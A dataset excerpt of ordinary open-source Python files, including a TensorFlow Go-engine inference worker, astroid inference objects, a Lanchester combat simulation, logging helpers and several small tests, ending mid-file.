filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_1520 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Worker process for running remote inference.
The worker wraps the inference model in an infinte loop: input features are
fetched via RPC at the top of the loop, and inference output is written back
at the bottom (again, via RPC).
"""
import abc
from contextlib import contextmanager
import sys
import time
import threading
from absl import flags
import grpc
import numpy as np
from proto import inference_service_pb2
from proto import inference_service_pb2_grpc
import tensorflow as tf
from tensorflow.python.training import saver
import dual_net
import features as features_lib
import go
from utils import dbg
flags.DEFINE_string("model", "", "Path to the TensorFlow model.")
flags.DEFINE_string("checkpoint_dir", "",
"Path to a directory containing TensorFlow model "
"checkpoints. The inference worker will monitor this "
"when a new checkpoint is found, load the model and use it "
"for futher inferences.")
flags.DEFINE_string("server_address", "localhost:50051",
"Inference server local address.")
flags.DEFINE_string("descriptor",
"proto/inference_service_py_pb2.pb.descriptor_set",
"Path to the InferenceService proto descriptor.")
flags.DEFINE_integer("parallel_tpus", 8,
"Number of TPU cores to run on in parallel.")
FLAGS = flags.FLAGS
# The default maximum receive RPC size is only 4MB, which isn't large enough
# for our messages.
GRPC_OPTIONS = [
("grpc.max_message_length", 50 * 1024 * 1024),
("grpc.max_receive_message_length", 50 * 1024 * 1024),
]
NUM_WORKER_THREADS = 2
class RwMutex(object):
"""A simple read/write mutex.
I'm surprised Python doesn't provide one of these by default.
"""
def __init__(self):
self._resource_lock = threading.Semaphore()
self._read_lock = threading.Semaphore()
self._read_count = 0
@contextmanager
def write_lock(self):
self._acquire_write()
try:
yield
finally:
self._release_write()
@contextmanager
def read_lock(self):
self._acquire_read()
try:
yield
finally:
self._release_read()
def _acquire_write(self):
self._resource_lock.acquire()
def _release_write(self):
self._resource_lock.release()
def _acquire_read(self):
with self._read_lock:
self._read_count += 1
if self._read_count == 1:
self._resource_lock.acquire()
def _release_read(self):
with self._read_lock:
self._read_count -= 1
if self._read_count == 0:
self._resource_lock.release()
def const_model_inference_fn(features):
"""Builds the model graph with weights marked as constant.
This improves TPU inference performance because it prevents the weights
being transferred to the TPU every call to Session.run().
Returns:
(policy_output, value_output, logits) tuple of tensors.
"""
def custom_getter(getter, name, *args, **kwargs):
with tf.control_dependencies(None):
return tf.guarantee_const(
getter(name, *args, **kwargs), name=name + "/GuaranteeConst")
with tf.variable_scope("", custom_getter=custom_getter):
return dual_net.model_inference_fn(features, False)
class Session(abc.ABC):
def __init__(self, sess):
self._sess = sess
# Event that gets set after a model is loaded.
# The worker threads wait for this event before starting inference.
self.model_available = threading.Event()
self._model_path = None
self._mutex = RwMutex()
def maybe_load_model(self, path):
"""Loads the given model if it's different from the current one."""
with self._mutex.read_lock():
if path == self._model_path:
return
with self._mutex.write_lock():
dbg(time.time(), "loading %s" % path)
self._locked_load_model(path)
self._model_path = path
dbg(time.time(), "loaded %s" % path)
self.model_available.set()
def run(self, raw_features):
"""Performs inference on the given raw features."""
features = self._prepare_features(raw_features)
with self._mutex.read_lock():
policy, value = self._locked_run(features)
local_model_path = self._model_path
return policy, value, local_model_path
def shutdown(self):
"""Shuts down the session."""
with self._mutex.write_lock():
self._locked_shutdown()
@abc.abstractmethod
def _locked_load_model(self, path):
"""Device-specific wrapper around a call to _load_graph.
Must be called with self._lock held for write.
"""
pass
@abc.abstractmethod
def _locked_run(self, raw_features):
"""Device-specific evaluation of the model with the given raw features.
Must be called with self._lock held for read.
"""
pass
@abc.abstractmethod
def _locked_shutdown(self, raw_features):
"""Device-specific shutdown.
Must be called with self._lock held for write.
"""
pass
@abc.abstractmethod
def _prepare_features(self, raw_features):
"""Device-specific preparation of raw features.
Does not require a lock to be held.
"""
pass
class BasicSession(Session):
def __init__(self):
Session.__init__(self, tf.Session(graph=tf.Graph()))
with self._sess.graph.as_default():
self._feature_placeholder = tf.placeholder(
tf.float32, [None, go.N, go.N,
features_lib.NEW_FEATURES_PLANES],
name='pos_tensor')
def _locked_shutdown(self):
pass
def _locked_load_model(self, path):
tf.reset_default_graph()
if path[-3:] == ".pb":
graph_def = tf.GraphDef()
with tf.gfile.FastGFile(path, 'rb') as f:
graph_def.ParseFromString(f.read())
with self._sess.graph.as_default():
self._outputs = tf.import_graph_def(
graph_def,
input_map={'pos_tensor': self._feature_placeholder},
return_elements=['policy_output:0', 'value_output:0'])
else:
with self._sess.graph.as_default():
self._outputs = dual_net.model_inference_fn(
self._feature_placeholder, training=False)
tf.train.Saver().restore(self._sess, path)
def _locked_run(self, features):
outputs = self._sess.run(self._outputs,
{self._feature_placeholder: features})
return outputs[0], outputs[1]
def _prepare_features(self, raw_features):
features = np.frombuffer(raw_features, dtype=np.int8)
features = features.reshape([-1, go.N, go.N,
features_lib.NEW_FEATURES_PLANES])
return features
class TpuSession(Session):
def __init__(self, tpu_name, parallel_tpus, batch_size):
tpu = [tpu_name] if tpu_name else None
tpu_grpc_url = tf.contrib.cluster_resolver.TPUClusterResolver(
tpu=tpu).get_master()
sess = tf.Session(tpu_grpc_url)
Session.__init__(self, sess)
self._parallel_tpus = parallel_tpus
self._batch_size = batch_size
# Create init & shutdown ops up front. This is probably not really
# necessary but it's what the sample code does.
self._tpu_init = tf.contrib.tpu.initialize_system()
self._tpu_shutdown = tf.contrib.tpu.shutdown_system()
self._feature_placeholders = []
with self._sess.graph.as_default():
for i in range(parallel_tpus):
features = tf.placeholder(
tf.float32, [None, go.N, go.N,
features_lib.NEW_FEATURES_PLANES],
name='pos_tensor')
self._feature_placeholders.append((features,))
self._outputs = tf.contrib.tpu.replicate(
const_model_inference_fn, self._feature_placeholders)
# tpu.replicate requires a list, but sess.run requires a tuple...
self._feature_placeholders = tuple(self._feature_placeholders)
def _locked_shutdown(self):
self._sess.run(self._tpu_shutdown)
def _locked_load_model(self, path):
if self._model_path:
dbg("shutting down tpu")
self._sess.run(self._tpu_shutdown)
with self._sess.graph.as_default():
tf.train.Saver().restore(self._sess, path)
dbg("initializing tpu")
self._sess.run(self._tpu_init)
def _locked_run(self, features):
outputs = self._sess.run(self._outputs,
{self._feature_placeholders: features})
policy = []
value = []
for x in outputs:
policy.extend(x[0])
value.extend(x[1])
return policy, value
def _prepare_features(self, raw_features):
num_board_features = go.N * go.N * features_lib.NEW_FEATURES_PLANES
num_features = self._batch_size * num_board_features
assert len(raw_features) == num_features * self._parallel_tpus
features = []
for i in range(self._parallel_tpus):
begin = i * num_features
x = np.frombuffer(
raw_features, dtype=np.int8, count=num_features, offset=begin)
x = x.reshape([self._batch_size, go.N, go.N,
features_lib.NEW_FEATURES_PLANES])
features.append(x)
return features
class Worker(object):
def __init__(self):
self.parallel_inferences = FLAGS.parallel_tpus if FLAGS.use_tpu else 1
self._get_server_config()
if FLAGS.use_tpu:
self.sess = TpuSession(
FLAGS.tpu_name, self.parallel_inferences, self.batch_size)
else:
self.sess = BasicSession()
if FLAGS.model:
self.sess.maybe_load_model(FLAGS.model)
def run(self):
self._running = True
try:
self._run_threads()
finally:
self._running = False
dbg("shutting down session")
self.sess.shutdown()
dbg("all done!")
def _get_server_config(self):
while True:
try:
channel = grpc.insecure_channel(FLAGS.server_address)
self.stub = inference_service_pb2_grpc.InferenceServiceStub(
channel)
config = self.stub.GetConfig(
inference_service_pb2.GetConfigRequest())
break
except grpc.RpcError:
dbg("Waiting for server")
time.sleep(1)
if config.board_size != go.N:
raise RuntimeError("Board size mismatch: server=%d, worker=%d" % (
config.board_size, go.N))
positions_per_inference = (config.games_per_inference *
config.virtual_losses)
if positions_per_inference % self.parallel_inferences != 0:
raise RuntimeError(
"games_per_inference * virtual_losses must be divisible by "
"parallel_tpus")
self.batch_size = positions_per_inference // self.parallel_inferences
dbg("parallel_inferences = %d" % self.parallel_inferences)
dbg("games_per_inference = %d" % config.games_per_inference)
dbg("virtual_losses = %d" % config.virtual_losses)
dbg("positions_per_inference = %d" % positions_per_inference)
dbg("batch_size = %d" % self.batch_size)
def _run_threads(self):
"""Run inference threads and optionally a thread that updates the model.
Synchronization between the inference threads and the model update
thread is performed using a RwLock that protects access to self.sess.
The inference threads enter the critical section using a read lock, so
they can both run inference concurrently. The model update thread enters
the critical section using a write lock for exclusive access.
"""
threads = []
# Start the worker threads before the checkpoint thread: if the parent
# process dies, the worker thread RPCs will fail and the thread will
# exit. This gives us a chance below to set self._running to False,
# telling the checkpoint thread to exit.
for i in range(NUM_WORKER_THREADS):
threads.append(threading.Thread(
target=self._worker_thread, args=[i]))
if FLAGS.checkpoint_dir:
threads.append(threading.Thread(target=self._checkpoint_thread))
for t in threads:
t.start()
for i, t in enumerate(threads):
t.join()
dbg("joined thread %d" % i)
# Once the first thread has joined, tell the remaining ones to stop.
self._running = False
def _checkpoint_thread(self):
dbg("starting model loader thread")
while self._running:
freshest = saver.latest_checkpoint(FLAGS.checkpoint_dir)
if freshest:
self.sess.maybe_load_model(freshest)
# Wait a few seconds before checking again.
time.sleep(5)
def _worker_thread(self, thread_id):
dbg("waiting for model")
while self._running and not self.sess.model_available.wait(1):
pass
dbg("running worker", thread_id)
while self._running:
features_response = self.stub.GetFeatures(
inference_service_pb2.GetFeaturesRequest())
policy, value, model_path = self.sess.run(
features_response.features)
put_outputs_request = inference_service_pb2.PutOutputsRequest(
batch_id=features_response.batch_id,
policy=np.concatenate(policy), value=value,
model_path=model_path)
self.stub.PutOutputs(put_outputs_request)
dbg("stopping worker", thread_id)
def main():
tf.logging.set_verbosity(tf.logging.DEBUG)
worker = Worker()
worker.run()
if __name__ == "__main__":
flags.FLAGS(sys.argv, known_only=True)
main()
|
the-stack_0_1523 | from __future__ import annotations
import functools
import operator
from abc import abstractmethod
from typing import (
Callable,
Dict,
NamedTuple,
Protocol,
Tuple,
TypeVar,
Union,
overload,
runtime_checkable,
)
from torch import Tensor
from torch import device as Device
from torch import dtype as DType
from . import constants
T = TypeVar("T", covariant=True)
V = TypeVar("V", contravariant=True)
@runtime_checkable
class Runnable(Protocol[T]):
@abstractmethod
def run(self) -> T:
...
@runtime_checkable
class TensorMixin(Protocol):
@overload
@abstractmethod
def size(self) -> Tuple[int, ...]:
...
@overload
@abstractmethod
def size(self, dim: int) -> int:
...
@abstractmethod
def size(self, dim: int | None = None) -> int | Tuple[int, ...]:
...
def numel(self) -> int:
return functools.reduce(operator.mul, self.size(), 1)
def dim(self) -> int:
return len(self.size())
@abstractmethod
def dtype(self) -> DType:
...
@abstractmethod
def device(self) -> str | Device:
...
class BatchNoBatch(NamedTuple):
batch: int
no_batch: int
class BatchInfo(NamedTuple):
index: int
value: int
def map(self, func: Callable[[int], int]) -> BatchInfo:
index = func(self.index)
return BatchInfo(index, self.value)
@runtime_checkable
class RunnableTensor(Runnable[Tensor], TensorMixin, Protocol):
@abstractmethod
def batch(self) -> BatchInfo | None:
...
@abstractmethod
def take_batch(self, low: int, high: int) -> Tensor:
...
@abstractmethod
def visit(self, nodes: Dict[int, TensorLike]) -> None:
...
def buffer(self) -> Dict[int, TensorLike]:
nodes = {}
self.visit(nodes)
return nodes
def buffer_numel(self) -> BatchNoBatch:
buffer = self.buffer().values()
return BatchNoBatch(
sum(t.numel() for t in buffer if bat(t) is not None),
sum(t.numel() for t in buffer if bat(t) is None),
)
def buffer_memory(self) -> BatchNoBatch:
buffer = self.buffer().values()
return BatchNoBatch(
sum(mem(t) for t in buffer if bat(t) is not None),
sum(mem(t) for t in buffer if bat(t) is None),
)
def memory(self) -> int:
return mem(self)
def dtyp(tensor: TensorLike) -> DType:
if isinstance(tensor, Tensor):
return tensor.dtype
return tensor.dtype()
def dev(tensor: TensorLike) -> str | Device:
if isinstance(tensor, Tensor):
return tensor.device
return tensor.device()
def mem(tensor: TensorLike) -> int:
dt = dtyp(tensor)
numel = tensor.numel()
return constants.MEMORY_BYTES[dt] * numel
def bat(tensor: TensorLike) -> BatchInfo | None:
if isinstance(tensor, RunnableTensor):
return tensor.batch()
return None
TensorLike = Union[Tensor, RunnableTensor]
|
the-stack_0_1524 | import argparse
def parse_args():
parser = argparse.ArgumentParser(
description="Get parameters for the ABM Simulation"
)
# Name and seed
parser.add_argument("--name", help="experiment name", required=True)
parser.add_argument("--seed", help="seed for reproducibility", type=int, default=42)
return parser.parse_args()
if __name__ == "__main__":
config = parse_args()
|
the-stack_0_1527 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 18 2017
@author: Alvaro Radigales
A simple Python implementation of the Lanchester Linear Law. Force
strength for each time pulse of the simulation is stored in a NumPy
array, and later plotted using MatPlotLib.
"""
import numpy
import matplotlib.pyplot as plot
from math import ceil
# The length of the time step will not alter the end result.
# Use only to determine the resolution of the graph.
timeStart = 0.0
timeEnd = 10.0
timeStep = 0.01
steps = int((timeEnd - timeStart) / timeStep)
# Initialise numpy arrays covering each step of the simulation.
blue = numpy.zeros(steps)
red = numpy.zeros(steps)
time = numpy.zeros(steps)
# To remove the frontage constraint, change the frontage variable to
# the smaller remaining force, both in its declaration and in the loop.
blue[0] = 42
red[0] = 30
frontage = 5
blueLethality = 1
redLethality = 1
time[0] = timeStart
for i in range(steps -1):
frontage = min(frontage, ceil(red[i]), ceil(blue[i]))
blue[i+1] = max(0, blue[i] - timeStep * (frontage * redLethality))
red[i+1] = max(0, red[i] - timeStep * (frontage * blueLethality))
time[i+1] = time[i] + timeStep
# Remaining forces at the end of the simulation, for plot label purposes.
blueRemaining = int(blue[len(blue)-1])
redRemaining = int(red[len(red)-1])
# Plot code.
plot.figure()
plot.step(time, blue, '-b', where = 'post', label = 'Blue army')
plot.step(time, red, '-r', where = 'post', label = 'Red army')
plot.ylabel('Strength')
plot.xlabel('Time')
plot.legend()
plot.annotate(blueRemaining,
xy=(timeEnd, blue[len(blue)-1]),
xytext=(-15,10),
textcoords='offset points')
plot.annotate(redRemaining,
xy=(timeEnd, red[len(red)-1]),
xytext=(-15,10),
textcoords='offset points')
plot.show() |
the-stack_0_1528 | """Loguru utils"""
# List of files in `fairseq_cli` that use logging. Any files other than these
# attempting to use logging will have their logger with the same file name
# (i.e., `__name__`).
name_list = ["eval_lm", "generate", "hydra_train", "interactive", "preprocess",
"train", "validate"]
def loguru_name_patcher(record):
filename = record["file"].name # filename, e.g., `train.py`
name = ".".join(filename.split(".")[:-1]) # remove the ".py" part
if name in name_list:
name = f"fairseq_cli.{name}" # legacy name, e.g., `fairseq_cli.train`
record["extra"].update(name=name)
def loguru_reset_logger(logger):
"""Remove all handlers"""
handlers_count = logger._core.handlers
for _ in range(len(handlers_count)):
logger.remove()
class LoguruLevels:
TRACE = 5
DEBUG = 10
INFO = 20
SUCCESS = 25
WARNING = 30
ERROR = 40
CRITICAL = 50
def loguru_set_level(logger, level):
"""Set level of all handlers of the provided logger. Note that this
implementation is very non-standard. Avoid using in any case."""
for handler in logger._core.handlers.values():
handler._levelno = level
def get_effective_level(logger):
"""Get effective level of the logger by finding the smallest level among
all handlers."""
levels = []
for handler in logger._core.handlers.values():
levels.append(handler.levelno)
return min(levels)
def loguru_emit_some_handlers(logger, handler_ids, message, name,
level_id="INFO"):
"""Emit message using specific handlers while ignoring others. Currently
only supports for non-colorized messages.
Parameters
----------
logger : loguru._logger.Logger
Loguru logger.
handler_ids : list of int
List of handler IDs to deal with.
message : str
Message to emit.
name : str
Logger name.
level_id : str
Level name.
"""
from loguru._recattrs import RecordLevel
from loguru._datetime import aware_now
core = logger._core
level_name, level_no, _, level_icon = core.levels[level_id]
for handler_id in handler_ids:
handler = core.handlers[handler_id]
log_record = {
"message": message,
"level": RecordLevel(level_name, level_no, level_icon),
"exception": None,
"time": aware_now(),
"extra": {"name": name},
}
handler.emit(log_record, level_id, from_decorator=False, is_raw=False,
colored_message=None)
|
the-stack_0_1529 | import pytest
import fsspec
pytest.importorskip("distributed")
@pytest.fixture()
def cli(tmpdir):
import dask.distributed
client = dask.distributed.Client(n_workers=1)
def setup():
m = fsspec.filesystem("memory")
with m.open('afile', 'wb') as f:
f.write(b'data')
client.run(setup)
try:
yield client
finally:
client.close()
def test_basic(cli):
fs = fsspec.filesystem('dask', remote_protocol='memory')
assert fs.ls('') == ['afile']
assert fs.cat('afile') == b'data'
|
the-stack_0_1530 | # Copyright (c) 2015-2016, 2018-2020 Claudiu Popa <[email protected]>
# Copyright (c) 2015-2016 Ceridwen <[email protected]>
# Copyright (c) 2015 Florian Bruhin <[email protected]>
# Copyright (c) 2016 Derek Gustafson <[email protected]>
# Copyright (c) 2018 hippo91 <[email protected]>
# Copyright (c) 2018 Bryce Guinta <[email protected]>
# Copyright (c) 2021 Pierre Sassoulas <[email protected]>
# Copyright (c) 2021 Marc Mueller <[email protected]>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
"""
Inference objects are a way to represent composite AST nodes,
which are used only as inference results, so they can't be found in the
original AST tree. For instance, inferring the following frozenset use,
leads to an inferred FrozenSet:
Call(func=Name('frozenset'), args=Tuple(...))
"""
from astroid import bases, decorators, node_classes, scoped_nodes, util
from astroid.const import BUILTINS
from astroid.exceptions import (
AttributeInferenceError,
InferenceError,
MroError,
SuperError,
)
from astroid.manager import AstroidManager
objectmodel = util.lazy_import("interpreter.objectmodel")
class FrozenSet(node_classes._BaseContainer):
"""class representing a FrozenSet composite node"""
def pytype(self):
return "%s.frozenset" % BUILTINS
def _infer(self, context=None):
yield self
@decorators.cachedproperty
def _proxied(self): # pylint: disable=method-hidden
ast_builtins = AstroidManager().builtins_module
return ast_builtins.getattr("frozenset")[0]
class Super(node_classes.NodeNG):
"""Proxy class over a super call.
This class offers almost the same behaviour as Python's super,
which is MRO lookups for retrieving attributes from the parents.
The *mro_pointer* is the place in the MRO from where we should
start looking, not counting it. *mro_type* is the object which
provides the MRO, it can be both a type or an instance.
*self_class* is the class where the super call is, while
*scope* is the function where the super call is.
"""
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.SuperModel())
def __init__(self, mro_pointer, mro_type, self_class, scope):
self.type = mro_type
self.mro_pointer = mro_pointer
self._class_based = False
self._self_class = self_class
self._scope = scope
super().__init__()
def _infer(self, context=None):
yield self
def super_mro(self):
"""Get the MRO which will be used to lookup attributes in this super."""
if not isinstance(self.mro_pointer, scoped_nodes.ClassDef):
raise SuperError(
"The first argument to super must be a subtype of "
"type, not {mro_pointer}.",
super_=self,
)
if isinstance(self.type, scoped_nodes.ClassDef):
# `super(type, type)`, most likely in a class method.
self._class_based = True
mro_type = self.type
else:
mro_type = getattr(self.type, "_proxied", None)
if not isinstance(mro_type, (bases.Instance, scoped_nodes.ClassDef)):
raise SuperError(
"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self,
)
if not mro_type.newstyle:
raise SuperError("Unable to call super on old-style classes.", super_=self)
mro = mro_type.mro()
if self.mro_pointer not in mro:
raise SuperError(
"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self,
)
index = mro.index(self.mro_pointer)
return mro[index + 1 :]
@decorators.cachedproperty
def _proxied(self):
ast_builtins = AstroidManager().builtins_module
return ast_builtins.getattr("super")[0]
def pytype(self):
return "%s.super" % BUILTINS
def display_type(self):
return "Super of"
@property
def name(self):
"""Get the name of the MRO pointer."""
return self.mro_pointer.name
def qname(self):
return "super"
def igetattr(self, name, context=None):
"""Retrieve the inferred values of the given attribute name."""
if name in self.special_attributes:
yield self.special_attributes.lookup(name)
return
try:
mro = self.super_mro()
# Don't let invalid MROs or invalid super calls
# leak out as is from this function.
except SuperError as exc:
raise AttributeInferenceError(
(
"Lookup for {name} on {target!r} because super call {super!r} "
"is invalid."
),
target=self,
attribute=name,
context=context,
super_=exc.super_,
) from exc
except MroError as exc:
raise AttributeInferenceError(
(
"Lookup for {name} on {target!r} failed because {cls!r} has an "
"invalid MRO."
),
target=self,
attribute=name,
context=context,
mros=exc.mros,
cls=exc.cls,
) from exc
found = False
for cls in mro:
if name not in cls.locals:
continue
found = True
for inferred in bases._infer_stmts([cls[name]], context, frame=self):
if not isinstance(inferred, scoped_nodes.FunctionDef):
yield inferred
continue
# We can obtain different descriptors from a super depending
# on what we are accessing and where the super call is.
if inferred.type == "classmethod":
yield bases.BoundMethod(inferred, cls)
elif self._scope.type == "classmethod" and inferred.type == "method":
yield inferred
elif self._class_based or inferred.type == "staticmethod":
yield inferred
elif isinstance(inferred, Property):
function = inferred.function
try:
yield from function.infer_call_result(
caller=self, context=context
)
except InferenceError:
yield util.Uninferable
elif bases._is_property(inferred):
# TODO: support other descriptors as well.
try:
yield from inferred.infer_call_result(self, context)
except InferenceError:
yield util.Uninferable
else:
yield bases.BoundMethod(inferred, cls)
if not found:
raise AttributeInferenceError(target=self, attribute=name, context=context)
def getattr(self, name, context=None):
return list(self.igetattr(name, context=context))
class ExceptionInstance(bases.Instance):
"""Class for instances of exceptions
It has special treatment for some of the exceptions's attributes,
which are transformed at runtime into certain concrete objects, such as
the case of .args.
"""
@decorators.cachedproperty
def special_attributes(self):
qname = self.qname()
instance = objectmodel.BUILTIN_EXCEPTIONS.get(
qname, objectmodel.ExceptionInstanceModel
)
return instance()(self)
class DictInstance(bases.Instance):
"""Special kind of instances for dictionaries
This instance knows the underlying object model of the dictionaries, which means
that methods such as .values or .items can be properly inferred.
"""
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.DictModel())
# Custom objects tailored for dictionaries, which are used to
# disambiguate between the types of Python 2 dict's method returns
# and Python 3 (where they return set like objects).
class DictItems(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class DictKeys(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class DictValues(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class PartialFunction(scoped_nodes.FunctionDef):
"""A class representing partial function obtained via functools.partial"""
def __init__(
self, call, name=None, doc=None, lineno=None, col_offset=None, parent=None
):
super().__init__(name, doc, lineno, col_offset, parent)
self.filled_positionals = len(call.positional_arguments[1:])
self.filled_args = call.positional_arguments[1:]
self.filled_keywords = call.keyword_arguments
def infer_call_result(self, caller=None, context=None):
if context:
current_passed_keywords = {
keyword for (keyword, _) in context.callcontext.keywords
}
for keyword, value in self.filled_keywords.items():
if keyword not in current_passed_keywords:
context.callcontext.keywords.append((keyword, value))
call_context_args = context.callcontext.args or []
context.callcontext.args = self.filled_args + call_context_args
return super().infer_call_result(caller=caller, context=context)
def qname(self):
return self.__class__.__name__
# TODO: Hack to solve the circular import problem between node_classes and objects
# This is not needed in 2.0, which has a cleaner design overall
node_classes.Dict.__bases__ = (node_classes.NodeNG, DictInstance)
class Property(scoped_nodes.FunctionDef):
"""Class representing a Python property"""
def __init__(
self, function, name=None, doc=None, lineno=None, col_offset=None, parent=None
):
self.function = function
super().__init__(name, doc, lineno, col_offset, parent)
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.PropertyModel())
type = "property"
def pytype(self):
return "%s.property" % BUILTINS
def infer_call_result(self, caller=None, context=None):
raise InferenceError("Properties are not callable")
def infer(self, context=None, **kwargs):
return iter((self,))
|
the-stack_0_1534 | import pytest
from mock import Mock, patch
from service import get_maps
@patch('service.map_service_common.get_all_maps')
def test_get_maps(get_all_maps_mock):
get_all_maps_mock.return_value = {}
response = get_maps.lambda_handler({}, None)
valid_response = {'statusCode': 200, 'body': '{"Maps": {}}', 'headers': {'Access-Control-Allow-Origin': '*'}}
get_all_maps_mock.assert_called()
assert response == valid_response
@patch('service.map_service_common.get_all_maps')
def test_get_maps_dynamo_failure(get_all_maps_mock):
with pytest.raises(IOError):
get_all_maps_mock.side_effect = Mock(side_effect=IOError('Dynamo Exception'))
get_maps.lambda_handler({}, None)
|
the-stack_0_1535 | import os
import json
import random
META = "../../important_data/"
N = 10000
def load_metadata(filename):
print("Start reading " + filename)
with open(os.path.join(META, filename)) as f:
data = json.load(f)
return data
def remove_version_ending(arxiv_id):
return arxiv_id.rsplit("v", 1)[0]
def format_name_to_id(name):
return ''.join(name.split()).lower()
def path_to_id(name):
""" Convert filepath name of ArXiv file to ArXiv ID """
if '.' in name: # new ID
return name
split = name.split("_")
return "/".join(split)
valid_aids = set(list(map(remove_version_ending, load_metadata("sampled_aids_100k.json"))))
arxiv_metadata = load_metadata("arxiv_id_to_doi_title.json")
# Get ground truth
print("Get Ground truth")
# Filter mag data to only include ID from the sampled 100k and which have an DOI
mag_gt_overall = {key: value for key, value in load_metadata("aid_to_ref_magids.json").items()
if ((key in valid_aids) and (arxiv_metadata[key][0]))}
# Add empty references
for key in load_metadata("aids_without_ref.json"):
if (key in valid_aids) and (arxiv_metadata[key][0]):
mag_gt_overall[key] = []
# Sample 10k
random.seed("Random Seed for similar results upon rerunning the code")
gt_keys = set(random.sample(list(mag_gt_overall.keys()), N))
# Build sampled_gt
mag_data = load_metadata("magid_to_data.json")
# Get (title,arxiv_id) for all references entries by MAG data
gt_aid_to_data = {key: [(mag_data[ref_mag_id][2], mag_data[ref_mag_id][3]) for ref_mag_id in mag_gt_overall[key]]
for key in gt_keys}
gt_len = len(gt_aid_to_data)
gt_overall_references = sum([len(value) for key, value in gt_aid_to_data.items()])
# Get Bierbaum Work
print("Get Bierbaum data")
bierbaum_overall = load_metadata("merged_internal-citations.json")
bierbaum_compare_with_version = {key: value for key, value in bierbaum_overall.items() if
remove_version_ending(key) in gt_keys}
bierbaum_compare = {}
for key, value in bierbaum_compare_with_version.items():
aid_without_version = remove_version_ending(key)
arxiv_citations_without_version = [remove_version_ending(tmp_aid) for tmp_aid in value]
bierbaum_compare[aid_without_version] = arxiv_citations_without_version
# Compare Bierbaum Work
print("Compare Bierbaum data")
bb_len = len(bierbaum_compare)
bb_overall_references = sum([len(value) for key, value in bierbaum_compare.items()])
bb_hit = 0
bb_miss = 0
bb_self = 0
# Compare based only arxiv IDs as bierbaum's work only has arxiv IDs
arxiv_metadata_keys = set(arxiv_metadata.keys())
for arxiv_id, references in bierbaum_compare.items():
# Get values of Ground truth
gt_references = gt_aid_to_data[arxiv_id]
gt_arxiv_ids = set([data[1] for data in gt_references if data[1]])
gt_titles = set([format_name_to_id(data[0]) for data in gt_references])
# Check compliance
for ref_aid in references:
# Skip in case of self reference
if ref_aid == arxiv_id:
bb_self += 1
continue
if ref_aid in gt_arxiv_ids:
bb_hit += 1
continue
if (ref_aid in arxiv_metadata_keys) and (format_name_to_id(arxiv_metadata[ref_aid][1]) in gt_titles):
bb_hit += 1
continue
# Unable to match the reference found by bierbaum to a reference in the ground truth
bb_miss += 1
# Compare parser results
print("Get Parser data")
parsed_100k = load_metadata("parsed_sampled_100k.json")
parsed_sampled_without_version = {}
for key, p_references in parsed_100k.items():
# Remove version
aid_no_version = remove_version_ending(key)
# Make _ to / as its coming from file names
aid_fixed = path_to_id(aid_no_version)
if aid_fixed in gt_keys:
parsed_sampled_without_version[aid_fixed] = [format_name_to_id(ref["title"]) for ref in p_references]
print("Compare Parser data")
p_len = len(parsed_sampled_without_version)
p_overall_references = sum([len(value) for key, value in parsed_sampled_without_version.items()])
p_hit = 0
p_miss = 0
p_self = 0
# Compare based only arxiv IDs as bierbaum's work only has arxiv IDs
for arxiv_id, references in parsed_sampled_without_version.items():
# Get values of Ground truth
gt_references = gt_aid_to_data[arxiv_id]
gt_titles = set([format_name_to_id(data[0]) for data in gt_references])
# Check compliance
for ref_title in references:
# Skip in case of self reference
if (arxiv_id in arxiv_metadata_keys) and (ref_title == format_name_to_id(arxiv_metadata[arxiv_id][1])):
p_self += 1
continue
if ref_title in gt_titles:
p_hit += 1
continue
# Unable to match the reference found by bierbaum to a reference in the ground truth
p_miss += 1
print("\n[Ground Truth (GT) MAG] Entries: {}; Overall references {}".format(gt_len, gt_overall_references))
print(("[Bierbaum] Entries: {} (%-of-GT: {:.2%}); Overall references {} (%-of-GT: {:.2%}); " +
"Found {} of GT references ({:.2%}). Found {} references not in GT (%-of-Bierbaum-Refs: {:.2%}). Self-references: {}").format(
bb_len, bb_len / gt_len, bb_overall_references, bb_overall_references / gt_overall_references,
bb_hit, bb_hit / gt_overall_references, bb_miss, bb_miss / bb_overall_references, bb_self)
)
print(("[Parser] Entries: {} (%-of-GT: {:.2%}); Overall references {} (%-of-GT: {:.2%}); " +
"Found {} of GT references ({:.2%}). Found {} references not in GT (%-of-Parser-Refs: {:.2%}). Self-references: {}").format(
p_len, p_len / gt_len, p_overall_references, p_overall_references / gt_overall_references,
p_hit, p_hit / gt_overall_references, p_miss, p_miss / p_overall_references, p_self)
)
|
the-stack_0_1537 | # Copyright 2021 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from ament_cmake_python import find_packages_data
class TestFindPackagesData(unittest.TestCase):
def test_all_packages_data_is_found(self):
data = find_packages_data()
assert set(data) == {'foo', 'foo.bar', 'baz'}
assert set(data['foo']) == {'data', 'data.txt'}
assert set(data['foo.bar']) == {
'data.txt',
